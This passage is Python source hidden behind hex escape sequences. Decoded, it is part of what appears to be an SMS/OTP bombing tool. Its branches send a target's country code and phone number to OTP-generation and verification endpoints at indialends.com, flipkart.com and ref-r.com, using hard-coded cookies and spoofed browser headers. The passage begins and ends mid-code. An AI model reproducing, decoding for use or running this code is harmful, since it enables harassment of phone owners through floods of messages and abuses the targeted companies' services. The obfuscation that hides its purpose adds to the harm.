\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x52\x52\x41\x66\x66\x69\x6e\x69\x74\x79\x27\x3a\x20\x27\x37\x34\x37\x65\x30\x63\x32\x36\x36\x34\x66\x35\x63\x62\x36\x31\x37\x39\x35\x38\x33\x39\x36\x33\x64\x38\x33\x34\x66\x34\x38\x39\x39\x65\x65\x65\x39\x66\x36\x63\x38\x64\x63\x63\x37\x37\x33\x66\x63\x30\x35\x63\x65\x34\x35\x66\x61\x30\x36\x62\x32\x34\x31\x37\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x39\x36\x39\x36\x32\x33\x37\x30\x35\x2e\x31\x35\x36\x30\x36\x36\x30\x34\x34\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x74\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x72\x65\x6e\x74\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x73\x5f\x70\x6c\x62\x74\x27\x3a\x20\x27\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x37\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68
\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30
\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x65\x79\x64\x65\x72\x30\x33\x74\x65\x61\x65\x61\x72\x65\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x65\x72\x74\x79\x73\x76\x66\x6a\x37\x34\x73\x6a\x65\x27\x3a\x20\x63\x63\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6a\x66\x73\x64\x66\x75\x31\x34\x68\x6b\x67\x65\x72\x74\x64\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x6a\x38\x30\x67\x65\x72\x74\x64\x66\x67\x27\x3a\x20\x27\x30\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x61\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x5f\x76\x32\x2e\x61\x73\x68\x78\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x68\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34
\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x38\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x38\x2e\x30\x20\x46\x4b\x55\x41\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x34\x31\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x44\x65\x73\x6b\x74\x6f\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20
\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x6c\x6f\x67\x69\x6e\x49\x64\x22\x3a\x5b\x22\x2b\x22\x2b\x63\x63\x2b\x70\x6e\x5d\x2c\x22\x73\x75\x70\x70\x6f\x72\x74\x41\x6c\x6c\x53\x74\x61\x74\x65\x73\x22\x3a\x74\x72\x75\x65\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x36\x2f\x75\x73\x65\x72\x2f\x73\x69\x67\x6e\x75\x70\x2f\x73\x74\x61\x74\x75\x73\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x37\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x54\x27\x3a\x20\x27\x42\x52\x25\x33\x41\x63\x6a\x76\x71\x7a\x68\x67\x6c\x75\x31\x6d\x7a\x74\x39\x35\x61\x79\x64\x7a\x68\x76\x77\x7a\x71\x31\x2e\x31\x35\x35\x38\x30\x33\x31\x30\x39\x32\x30\x35\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x57\x41\x42\x27\x3a\x20\x27\x62\x75\x69\x6c\x64\x2d\x34\x34\x62\x65\x39\x65\x34\x37\x34\x36\x31\x61\x37\x34\x64\x37\x33\x37\x39\x31\x34\x32\x30\x37\x62\x63\x62\x61\x66\x63\x33\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x75\x78\x5f\x75\x69\x64\x27\x3a\x20\x27\x31\x35\x35\x38\x36\x37\x39\x30\x34\x33\x38\x31\x38\x39\x32\x39\x38\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x4d\x43\x56\x53\x5f\x31\x37\x45\x42\x34\x30\x31\x30\x35\x33\x44\x41\x46\x34\x38\x34\x30\x41\x34\x39\x30\x44\x34\x43\x25\x34\x30\x41\x64\x6f\x62\x65\x4f\x72\x67\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x4d\x43\x56\x5f\x31\x37\x45\x42\x34\x30\x31\x30\x35\x33\x44\x41\x46\x34\x38\x34\x30\x41\x34\x39\x30\x44\x34\x43\x25\x34\x30\x41\x64\x6f\x62\x65
\x4f\x72\x67\x27\x3a\x20\x27\x2d\x32\x32\x37\x31\x39\x36\x32\x35\x31\x25\x37\x43\x4d\x43\x49\x44\x54\x53\x25\x37\x43\x31\x38\x30\x34\x31\x25\x37\x43\x4d\x43\x4d\x49\x44\x25\x37\x43\x36\x33\x32\x37\x33\x33\x35\x33\x30\x33\x35\x35\x30\x39\x33\x30\x34\x35\x37\x36\x39\x32\x37\x37\x31\x39\x32\x30\x33\x39\x34\x38\x39\x33\x33\x32\x34\x36\x25\x37\x43\x4d\x43\x41\x49\x44\x25\x37\x43\x4e\x4f\x4e\x45\x25\x37\x43\x4d\x43\x4f\x50\x54\x4f\x55\x54\x2d\x31\x35\x35\x38\x36\x38\x36\x32\x34\x35\x73\x25\x37\x43\x4e\x4f\x4e\x45\x25\x37\x43\x4d\x43\x41\x41\x4d\x4c\x48\x2d\x31\x35\x35\x39\x32\x38\x33\x38\x34\x35\x25\x37\x43\x31\x32\x25\x37\x43\x4d\x43\x41\x41\x4d\x42\x2d\x31\x35\x35\x39\x32\x38\x33\x38\x34\x35\x25\x37\x43\x6a\x38\x4f\x64\x76\x36\x4c\x6f\x6e\x4e\x34\x72\x33\x61\x6e\x37\x4c\x68\x44\x33\x57\x5a\x72\x55\x31\x62\x55\x70\x41\x6b\x46\x6b\x6b\x69\x59\x31\x6e\x63\x42\x52\x39\x36\x74\x32\x50\x54\x49\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x5f\x63\x63\x27\x3a\x20\x27\x74\x72\x75\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x4e\x27\x3a\x20\x27\x32\x2e\x56\x49\x38\x30\x38\x35\x41\x36\x41\x32\x33\x37\x45\x42\x34\x43\x36\x32\x38\x33\x36\x43\x38\x38\x30\x39\x46\x30\x44\x33\x31\x32\x45\x42\x2e\x53\x49\x32\x31\x41\x39\x45\x43\x34\x45\x39\x39\x42\x39\x34\x39\x42\x32\x41\x43\x45\x36\x33\x36\x31\x42\x33\x46\x30\x32\x30\x38\x43\x43\x2e\x56\x53\x31\x38\x37\x36\x34\x39\x42\x32\x42\x30\x36\x41\x34\x34\x43\x36\x39\x38\x32\x34\x30\x30\x36\x37\x31\x30\x43\x42\x36\x44\x38\x33\x2e\x31\x35\x35\x38\x36\x37\x39\x30\x37\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x70\x76\x5f\x70\x6e\x27\x3a\x20\x27\x48\x6f\x6d\x65\x50\x61\x67\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x70\x76\x5f\x70\x6e\x5f\x74\x27\x3a\x20\x27\x48\x6f\x6d\x65\x70\x61\x67\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x27\x3a\x20\x27\x64\x31\x74\x31\x37\x47\x51\x56\x71\x50\x7a\x39\x4b\x50\x7a\x6f\x62\x50\x33\x4d\x34\x47\x51\x6b\x6a\x50\x79\x33\x34\x54\x6a\x66\x4a\x78\x49\x34\x53\x62
\x58\x56\x49\x76\x68\x77\x7a\x6d\x33\x6d\x45\x31\x33\x76\x66\x53\x45\x75\x6c\x6d\x66\x39\x30\x44\x2f\x37\x4c\x37\x31\x30\x71\x55\x70\x4d\x71\x38\x6d\x41\x30\x6b\x32\x62\x78\x36\x62\x32\x44\x75\x77\x49\x53\x34\x67\x3d\x3d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x5f\x73\x71\x27\x3a\x20\x27\x25\x35\x42\x25\x35\x42\x42\x25\x35\x44\x25\x35\x44\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x36\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x20\x46\x4b\x55\x41\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x34\x31\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x44\x65\x73\x6b\x74\x6f\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e
\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x6f\x67\x69\x6e\x49\x64\x27\x3a\x20\x27\x2b\x27\x2b\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x74\x61\x74\x65\x27\x3a\x20\x27\x56\x45\x52\x49\x46\x49\x45\x44\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x68\x75\x72\x6e
\x45\x6d\x61\x69\x6c\x52\x65\x71\x75\x65\x73\x74\x27\x3a\x20\x27\x66\x61\x6c\x73\x65\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x35\x2f\x75\x73\x65\x72\x2f\x6f\x74\x70\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x38\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x72\x65\x66\x2d\x72\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x36\x35\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x36\x35\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
